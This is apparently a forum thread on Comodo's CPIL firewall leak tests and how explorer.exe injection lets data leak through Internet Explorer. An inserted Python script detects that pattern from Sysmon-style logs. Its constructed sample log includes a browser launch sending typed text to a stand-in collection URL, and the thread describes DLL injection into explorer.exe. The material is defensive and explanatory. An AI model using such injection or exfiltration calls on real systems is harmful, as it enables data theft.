I'm talking about the triple (3-button) test "CPILSuite" downloadable from COMODO's site:
After pushing the first button (Test 1), at COMODO's request pop-up, if you allow explorer.exe as parent for Iexplore.exe, the IE browser will open with the info typed, announcing failure.
I've downloaded the CPILSuite and run the first test - the one you say leaks.
All I got was a firewall alert telling me that IE was trying to send data (the data it was trying to send was the data I typed into CPIL). I clicked BLOCK (without clicking "REMEMBER") and the data was not sent. Naturally, if I had clicked ALLOW, the data would have been sent.
Not being funny, but do you fully understand the concept behind leak testers?
When you run a leak test, it will typically ask you to enter some data that it will attempt to transmit to a remote site, where you can view the data you typed in locally, thereby proving that the firewall has allowed the data to leak. After you have typed in the text, a good firewall will display an alert about IE attempting to transmit data. At this point, the firewall still has not leaked, as it is waiting for you to tell it whether to leak or not.
If you click ALLOW, of course it's going to leak, because you explicitly told it to. If you click BLOCK, it won't, but the firewall has actually stopped IE dead in its tracks (because it is the communicating medium, not the leak test), not the leak test. At this point you should reboot to run the next leak test (it's a good idea to reboot between each attempted leak test).
The KEY factor is to not click REMEMBER!!!!! The firewall alert is about IE, not the leak test, and if you click REMEMBER and BLOCK, you have just successfully blocked IE until you remove the application monitor rule.
There cannot be an automated response to this type of threat, as this type of threat keeps changing. How many leaktests were there two years ago? Maybe one or two. How many are there now? Around twenty. The nature of the threat changes and, as good as Comodo is, their crystal ball can't foresee what the bad guys will come up with next.
The problem is that most sophisticated code/dll injections involve this file, and for now, there is no way to make distinctive rules against exploiting it, without messing up all your Internet connections.
All we can do now is to block these attacks but only once, and then, most likely, reboot the system to get rid of the malicious injections.
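The pattern the last two posts describe (a test program injecting into explorer.exe so that the shell, rather than the test itself, launches IE with the typed data in a URL) is hard to block with a static rule, but it is easy to spot after the fact in process telemetry. Below is an added detection example written for this thread; it is not code from any of the posters or from Comodo. It assumes Sysmon-style event IDs (1 = ProcessCreate, 8 = CreateRemoteThread), a made-up pipe-delimited log format, and constructed process names, paths, PIDs and timestamps; the 30-second correlation window is an assumption too. It correlates a remote-thread injection into explorer.exe with a browser that explorer.exe spawns shortly afterwards, and pulls the query-string data out of the browser's command line so an analyst can see what would have been leaked.

```python
"""Correlate a remote-thread injection into explorer.exe with explorer.exe
then launching a browser that carries data in its URL.

Constructed example for the leak-test discussion above; not code from the
forum posters or from Comodo. Event IDs follow Sysmon's numbering
(1 = ProcessCreate, 8 = CreateRemoteThread); the log format, process names,
paths, PIDs and timestamps below are all made up for the demonstration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

SHELL = "explorer.exe"
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
WINDOW = timedelta(seconds=30)  # assumed: injection precedes launch by <= 30 s


@dataclass
class Event:
    ts: datetime
    event_id: int
    fields: dict


# Constructed sample log: "timestamp|event_id|key=value;key=value;..."
# Line 2 is the test tool injecting into the shell; line 3 is the shell
# launching IE with the typed text in the URL; line 4 is a normal launch.
SAMPLE_LOG = """\
2024-01-01T10:00:00|1|Image=C:\\Tools\\cpil.exe;ParentImage=C:\\Windows\\explorer.exe;ProcessId=4100;ParentProcessId=1200;CommandLine=cpil.exe
2024-01-01T10:00:05|8|SourceImage=C:\\Tools\\cpil.exe;TargetImage=C:\\Windows\\explorer.exe;SourceProcessId=4100;TargetProcessId=1200
2024-01-01T10:00:06|1|Image=C:\\Program Files\\Internet Explorer\\iexplore.exe;ParentImage=C:\\Windows\\explorer.exe;ProcessId=4200;ParentProcessId=1200;CommandLine=iexplore.exe http://leaktest.example/collect?data=typed+text
2024-01-01T10:05:00|1|Image=C:\\Program Files\\Internet Explorer\\iexplore.exe;ParentImage=C:\\Windows\\explorer.exe;ProcessId=4300;ParentProcessId=1200;CommandLine=iexplore.exe http://news.example/
"""


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> list:
    """Parse the constructed log format into Event objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, rest = line.split("|", 2)
        # maxsplit=1 keeps '=' inside URL query strings intact
        fields = dict(kv.split("=", 1) for kv in rest.split(";"))
        events.append(Event(datetime.fromisoformat(ts), int(event_id), fields))
    return events


def url_params(command_line: str) -> dict:
    """Extract query-string parameters from the first URL on a command line."""
    for token in command_line.split():
        if token.lower().startswith(("http://", "https://")):
            return parse_qs(urlparse(token).query)
    return {}


def find_injected_browser_launches(events: list) -> list:
    """Flag browser launches whose parent shell was injected shortly before."""
    injections = [
        e for e in events
        if e.event_id == 8 and basename(e.fields["TargetImage"]) == SHELL
    ]
    findings = []
    for e in events:
        if e.event_id != 1 or basename(e.fields["Image"]) not in BROWSERS:
            continue
        if basename(e.fields["ParentImage"]) != SHELL:
            continue
        for inj in injections:
            same_shell = inj.fields["TargetProcessId"] == e.fields["ParentProcessId"]
            delta = e.ts - inj.ts
            if same_shell and timedelta(0) <= delta <= WINDOW:
                findings.append({
                    "time": e.ts,
                    "injector": basename(inj.fields["SourceImage"]),
                    "browser": basename(e.fields["Image"]),
                    "params": url_params(e.fields["CommandLine"]),
                })
    return findings


if __name__ == "__main__":
    for f in find_injected_browser_launches(parse_log(SAMPLE_LOG)):
        print(f"{f['time']} {f['injector']} -> {f['browser']} params={f['params']}")
```

On the sample data only the 10:00:06 launch is flagged: it follows the injection into the same explorer.exe PID within the window, and its URL carries the typed text. The 10:05 launch from the same shell is left alone, which is the point of keying on the injection rather than on explorer.exe spawning a browser (which is what every double-clicked shortcut does).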
What you say is exactly correct - what you've described IS all we can do. I would rather KNOW about each and every threat that managed to get inside my PC and be able to block it, than place blind trust (sorry Melih) in any security app. If the price of security is a handful of clicks and a little bit of awareness, then I for one am happy to pay that price.
Hope this helps,